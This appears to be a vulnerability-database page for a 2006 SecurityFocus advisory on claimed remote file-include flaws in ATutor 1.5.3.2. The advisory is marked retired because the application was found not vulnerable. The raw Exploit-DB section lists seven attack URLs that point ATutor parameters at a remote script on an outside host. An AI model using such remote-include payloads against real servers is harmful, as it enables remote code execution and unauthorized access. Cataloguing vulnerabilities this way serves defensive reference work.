ATutor Multiple Remote File-Include Vulnerabilities

vendor:

ATutor

by:

SecurityFocus

2.6

CVSS

LOW

Remote File-Include

CWE

Product Name: ATutor

Affected Version From: ATutor 1.5.3.2 and prior versions

Affected Version To: ATutor 1.5.3.2 and prior versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

ATutor Multiple Remote File-Include Vulnerabilities

ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20634/info

ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

ATutor 1.5.3.2 and prior versions are vulnerable to these issues; other versions may also be affected.

This BID is being retired; further analysis reveals that the application is not vulnerable to this issue.

http://www.example.com/ATutor/documentation/common/frame_toc.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/print.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/vitals.inc.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?